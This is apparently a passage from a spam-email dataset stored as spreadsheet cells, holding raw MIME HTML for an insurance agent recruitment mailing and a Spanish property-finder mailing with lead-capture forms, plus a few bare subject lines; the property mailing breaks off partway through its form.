 ------=_NextPart_000_8531F_01C234BE.5332BD60
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Outstanding Opportunities for "Premier Producers"&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;p align=3D"center"&gt;
   &lt;table width=3D"550" border=3D"2" cellspacing=3D"0" cellpadding=3D"0" =
 bordercolor=3D"#000000"&gt;
     &lt;tr&gt;
       &lt;td&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/header.gif" =
 width=3D"550" height=3D"114" alt=3D'Outstanding Opportunities for =
 "Premier Producers"'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/top.jpg" =
 width=3D"550" height=3D"179"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/mid.jpg" =
 width=3D"550" height=3D"177"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/bot.jpg" =
 width=3D"550" height=3D"147" alt=3D"Our Client's Search =
 includes:&amp;#10;Full-Time Agents&amp;#10;Sales Managers&amp;#10;General =
 Agents&amp;#10;CPA Partners&amp;#10;Independant Agents"&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/NLV/opps/imagine_ani.gif" width=3D"409" =
 height=3D"43" alt=3D'Imagine'&gt;&lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;=20
             &lt;td&gt;&lt;img src=3D"http://iiq.us/images/NLV/opps/second.gif" =
 width=3D"550" height=3D"161"&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"7"&gt;
           &lt;tr&gt;=20
             &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/NLV/opps/plus.gif" width=3D"366" =
 height=3D"30" alt=3D'Plus access to 385 other companies'&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"0"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;table width=3D"100%"&gt;
                 &lt;tr&gt;=20
                   &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                     &lt;td&gt;=20
                       &lt;table width=3D"100%" border=3D"0" =
 cellspacing=3D"0" cellpadding=3D"2" align=3D"center" =
 bgcolor=3D"#ffffff"&gt;
                         &lt;tr&gt;=20
                           &lt;td colspan=3D"7" align=3D"center"&gt;&lt;font =
 face=3D"Verdana, Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;&lt;b&gt;
                             For A Confidential Phone Interview Please =
 Complete Form &amp;amp; Submit&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;=20
                             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#000066"&gt;Name:&lt;/font&gt;
                           &lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;=20
                             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#000066"&gt;E-mail:&lt;/font&gt;
                           &lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;=20
                             &lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2" color=3D"#000066"&gt;Phone:&lt;/font&gt;
                           &lt;/td&gt;
                           &lt;td colspan=3D"6"&gt;=20
                             &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;City:&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"2"&gt;=20
                             &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"8%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;State:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"21%" colspan=3D"3"&gt;=20
                             &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                           &lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;&lt;font =
 face=3D"Arial, Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Area =
 of Interest:&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"5%" align=3D"right"&gt;=20
                             &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"FullTimeAgents"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"20%"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Full-Time =
 Agent&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"8%" align=3D"right"&gt;=20
                             &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"SalesManagers"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"21%"&gt;&lt;font face=3D"Arial, =
 Helvetica, sans-serif" size=3D"2" color=3D"#000066"&gt;Sales =
 Manager&lt;/font&gt;&lt;/td&gt;
                           &lt;td align=3D"right" valign=3D"middle" =
 width=3D"4%"&gt;=20
                             &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"GeneralAgents"&gt;
                           &lt;/td&gt;
                           &lt;td align=3D"left" valign=3D"middle" =
 width=3D"23%"&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#000066"&gt;General Agent&lt;/font&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td width=3D"5%" align=3D"right"&gt;
                             &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"CPAPartners"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"20%"&gt;&lt;font size=3D"2" =
 face=3D"Arial, Helvetica, sans-serif" color=3D"#000066"&gt;CPA =
 &amp;quot;Partner&amp;quot;&lt;/font&gt;&lt;/td&gt;
                           &lt;td width=3D"8%" align=3D"right"&gt;=20
                             &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"IndependentAgents"&gt;
                           &lt;/td&gt;
                           &lt;td width=3D"21%"&gt;&lt;font size=3D"2" =
 face=3D"Arial, Helvetica, sans-serif" color=3D"#000066"&gt;Independent =
 Agent&lt;/font&gt;&lt;/td&gt;
                           &lt;td colspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;tr&gt;=20
                           &lt;td width=3D"19%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                           &lt;td colspan=3D"4"&gt;=20
                             &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"nlv@insiq.com"&gt;
                             &lt;input type=3D"hidden" =
 name=3D"hdnSubjectTxt" value=3D"NLV Recruit"&gt;
                           &lt;/td&gt;
                           &lt;td colspan=3D"2" align=3D"center" =
 valign=3D"middle"&gt;&lt;img src=3D"http://63.211.81.87/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                       &lt;/table&gt;
                     &lt;/td&gt;
                   &lt;input type=3D'hidden' name=3D'SentTo' =
 value=3D'304704'&gt;
 &lt;/form&gt;
                 &lt;/tr&gt;
               &lt;/table&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width=3D"550" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"8"&gt;
           &lt;tr&gt;=20
             &lt;td&gt;=20
               &lt;div align=3D"center"&gt;&lt;font face=3D"Verdana, Arial, =
 Helvetica, sans-serif" size=3D"1"&gt;We=20
                 don't want anybody to receive or mailing who does not =
 wish to=20
                 receive them. This is professional communication sent to =
 insurance=20
                 professionals. To be removed from this mailing list, DO =
 NOT REPLY=20
                 to this message. Instead, go here: &lt;a =
 href=3D"http://www.Insurancemail.net"&gt;http://www.Insurancemail.net&lt;/a&gt;=20
                 &lt;br&gt;
                 &lt;a href=3D"http://www.insuranceiq.com/legal.htm"&gt;Legal =
 Notice&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_8531F_01C234BE.5332BD60--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] GREEN CARD CEKLS  KACIRMAYIN
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Looking for property in SPAIN?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------_NextPart_4488214905
 Content-Type: text/plain; charset="ISO-8859-1"
 Content-Transfer-Encoding: QUOTED-PRINTABLE
 Looking for Property in Spain?
 Don_t waste your Time! 
 That is what most people do when they look for property using property web sites. Why?
  Because many of the properties that are advertised on them have already been sold!
  You could waste precious time looking for and inquiring after properties that have already been SOLD!
  How Frustrating!!! 
 The property market is moving very fast here in Spain and frankly many estate agents do not have the time to update their web sites.
 What you need is a company that can find you property that is actually for sale and can present to you a selection of current properties that specifically fit your requirements.
 Just think of how much time and effort that would save you!
 Property finders Spain 
 can do just that!
 We are here in Spain and have a many ways of looking for property that has just arrived on the market, even looking in the local papers! 
 So while others are chasing properties or new projects that are no longer for sale you can be viewing property that has just arrived on the market! 
 Simply fill in the form below and press the send button and we will do all of the hard work for you. 
 Once we receive your requirements we will immediately begin looking for current properties just right for you.
 Property finders Form
 Property Type Villa Apartment Town House New building projects Plot of Land
 Number of bedrooms 1 2 3 4 5 6
 Location
 Do you want a Sea View? Yes No Don`t care
 Mountain View Yes No Don`t care
 A property in the country
 A Property in or near a city
 Pool Yes, No Yes No Don`t care
 Price Range
 Are you planning to come 
 to Spain in the next three months Yes, No? Yes No
 Name
 E mail address
 Telephone Number
 Country Code
 Let us find a property for you!
 ------_NextPart_4488214905
 Content-Type: text/html; charset="ISO-8859-1"
 Content-Transfer-Encoding: QUOTED-PRINTABLE
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META NAME=3D"GENERATOR" Content=3D"Microsoft DHTML Editing Control"&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;DIV&gt;
 &lt;TABLE id=3DAutoNumber1 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"100%"&gt;&lt;IMG height=3D92 
       src=3D"http://www.secure-siteserver.com/flyer/logo2.jpg" width=3D757 
     border=3D0&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE id=3DAutoNumber2 style=3D"BORDER-COLLAPSE: collapse" borderColor=3D#111111 
 height=3D83 cellSpacing=3D0 cellPadding=3D0 width=3D"101%" border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width=3D"3%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"74%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"23%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;
     &lt;TD width=3D"2%" bgColor=3D#0066cc height=3D21&gt;&amp;nbsp;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD width=3D"3%" bgColor=3D#0066cc height=3D36&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
     &lt;TD width=3D"74%" height=3D36&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;B&gt;&lt;SPAN style=3D"FONT-SIZE: 28pt; COLOR: blue"&gt;Looking for 
       Property in Spain?&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt; COLOR: red; FONT-FAMILY: Arial"&gt;&lt;STRONG&gt;&lt;FONT 
       face=3D"Arial Black"&gt;Don_t waste your Time!&lt;/FONT&gt;&lt;/STRONG&gt; &lt;/SPAN&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;That is what 
       most people do when they look for property using property web sites. 
       &lt;B&gt;&lt;I&gt;&lt;SPAN style=3D"COLOR: red"&gt;Why?&lt;/SPAN&gt;&lt;/I&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;Because 
       many of the properties that are advertised on them have&lt;B&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;B&gt; &lt;I&gt;already been 
 sold!&lt;/I&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;FONT style=3D"FONT-SIZE: 17pt" 
       face=3DArial&gt;You could waste precious time looking for and inquiring after 
       properties that &lt;B&gt;have already been SOLD!&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;B&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;&amp;nbsp;&lt;FONT 
       face=3D"Arial Black" color=3D#ff0000&gt;How Frustrating!!!&lt;/FONT&gt; 
       &lt;/SPAN&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;The property 
       market is moving very fast here in Spain and frankly many estate agents do 
       not have the time to update their web sites.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;What you need 
       is a company that can find you property that is actually for sale and can 
       present to you a selection of current properties that specifically fit 
       your requirements.&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
       style=3D"FONT-SIZE: 17pt" face=3DArial&gt;Just think of how much time and effort 
       that would save you!&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoBodyText2 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
       style=3D"FONT-SIZE: 17pt" face=3DArial&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3D"Arial Black"&gt;&lt;B&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;FONT color=3D#0000ff&gt;Property finders Spain&lt;/FONT&gt; 
       &lt;/SPAN&gt;&lt;/B&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;&lt;FONT face=3D"Arial Black"&gt;can do 
       just that!&lt;/FONT&gt;&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 17pt"&gt;We are here in 
       Spain and have a many ways of looking for property that has just arrived 
       on the market, &lt;I&gt;even looking in the local papers!&lt;/I&gt; &lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial color=3D#0000ff&gt;&lt;I&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;So while others are chasing properties or new 
       projects that are no longer for sale &lt;STRONG&gt;you can be viewing property 
       that has just arrived on the market!&lt;/STRONG&gt; &lt;/SPAN&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoNormal 
       style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; TEXT-ALIGN: center" 
       align=3Dcenter&gt;&lt;FONT face=3DArial&gt;&lt;SPAN 
       style=3D"FONT-SIZE: 17pt"&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P class=3DMsoBodyText3 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
       style=3D"FONT-SIZE: 17pt" face=3DArial&gt;&lt;B&gt;Simply fill in the form below and 
       press the send button and we will do all of the hard work for you. 
       &lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P class=3DMsoBodyText3 style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
       style=3D"FONT-SIZE: 17pt" face=3DArial&gt;&lt;B&gt;&lt;/B&gt;&lt;/FONT&gt;&amp;nbsp;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SPAN lang=3DEN-GB 
       style=3D"FONT-SIZE: 17pt; FONT-FAMILY: Arial"&gt;Once we receive your 
       requirements we will immediately begin looking for current properties just 
       right for you.&lt;/SPAN&gt;&lt;/P&gt;
       &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;
       &lt;FORM language=3DJavaScript name=3DFrontPage_Form1 
       onsubmit=3D"return FrontPage_Form1_Validator(this)" 
       action=3Dhttp://www.secure-siteserver.com/wwc/mailform.pl method=3Dpost&gt;
       &lt;TABLE id=3DAutoNumber4 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D1&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"100%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px" align=3Dcenter&gt;&lt;B&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 22pt"&gt;Property finders 
         Form&lt;/SPAN&gt;&lt;/B&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;TABLE id=3DAutoNumber5 style=3D"BORDER-COLLAPSE: collapse" 
       borderColor=3D#111111 cellSpacing=3D0 cellPadding=3D0 border=3D0&gt;&lt;INPUT 
         type=3Dhidden value=3D1 name=3Dprint_blank_fields&gt; &lt;INPUT type=3Dhidden 
         value=3DREMOTE_HOST,REMOTE_ADDR name=3Denv_report&gt; &lt;INPUT type=3Dhidden 
         value=3Dcostasol1@freeuk.com name=3Drecipient&gt; &lt;INPUT type=3Dhidden 
         value=3Dhttp://www.secure-siteserver.com/flyer/thank_you.htm 
         name=3Dredirect&gt; 
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&amp;nbsp;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Property 
             Type&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DType_of_property&gt; &lt;OPTION selected&gt;Villa&lt;/OPTION&gt; 
               &lt;OPTION&gt;Apartment&lt;/OPTION&gt; &lt;OPTION&gt;Town House&lt;/OPTION&gt; &lt;OPTION&gt;New 
               building projects&lt;/OPTION&gt; &lt;OPTION&gt;Plot of 
           Land&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Number of 
             bedrooms&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT multiple 
             size=3D1 name=3DHow_many_bedrooms&gt; &lt;OPTION&gt;1&lt;/OPTION&gt; 
               &lt;OPTION&gt;2&lt;/OPTION&gt; &lt;OPTION&gt;3&lt;/OPTION&gt; &lt;OPTION&gt;4&lt;/OPTION&gt; 
               &lt;OPTION&gt;5&lt;/OPTION&gt; &lt;OPTION&gt;6&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN 
           style=3D"FONT-SIZE: 13pt"&gt;Location&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;INPUT 
             name=3DLocation&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SPAN 
             style=3D"FONT-SIZE: 13pt; FONT-FAMILY: Arial"&gt;Do you want a Sea 
             View?&lt;/SPAN&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3Dsea_view&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; &lt;OPTION&gt;No&lt;/OPTION&gt; 
               &lt;OPTION&gt;Don`t care&lt;/OPTION&gt;&lt;/SELECT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=3D"39%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;FONT 
             face=3DArial&gt;&lt;SPAN style=3D"FONT-SIZE: 13pt"&gt;Mountain 
             View&lt;/SPAN&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
           &lt;TD width=3D"61%"&gt;
             &lt;P style=3D"MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px"&gt;&lt;SELECT size=3D1 
             name=3DMountain_view&gt; &lt;OPTION selected&gt;Yes&lt;/OPTION&gt; 
